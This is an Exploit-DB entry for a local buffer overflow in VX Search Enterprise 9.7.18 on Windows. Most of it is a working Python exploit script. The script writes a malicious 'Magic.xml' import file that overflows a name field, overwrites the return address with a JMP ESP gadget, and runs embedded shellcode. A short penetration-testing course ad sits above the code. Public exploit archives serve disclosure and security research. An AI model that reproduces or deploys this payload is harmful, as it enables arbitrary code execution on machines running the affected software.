VX Search Enterprise 9.7.18 - Local Buffer Overflow

EDB-ID:

42181

CVE:

N/A




Platform:

Windows

Date:

2017-06-15


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

import os
import struct

author = '''
   
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
   
# Exploit Title: VX Search Enterprise v9.7.18 Import Local Buffer Overflow Vuln.
# Date: 2017.06.15
# Exploit Author: Greg Priest
# Version: VX Search Enterprise v9.7.18
# Tested on: Windows7 x64 HUN/ENG Professional
'''
 
 

overflow = "A" * 1536
jmp_esp = "\x4E\x21\x1F\x65"
#"\x94\x21\x1C\x65"
shortjump = "\xEB\x55"
shellcode3= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
            "\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83"
            "\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe"
            "\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd"
            "\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5"
            "\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e"
            "\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f"
            "\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77"
            "\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e"
            "\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40"
            "\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70"
            "\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc"
            "\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17"
            "\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8"
            "\xae\xc2\x28\x4b\x32\x05")

crash = overflow+jmp_esp+"\x90"*24+shortjump+"\x90"*76+"\x90" * 58+shellcode3

evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
exploit = open('Magic.xml', 'w')
exploit.write(evil)
exploit.close()

print "Magic.xml raedy!"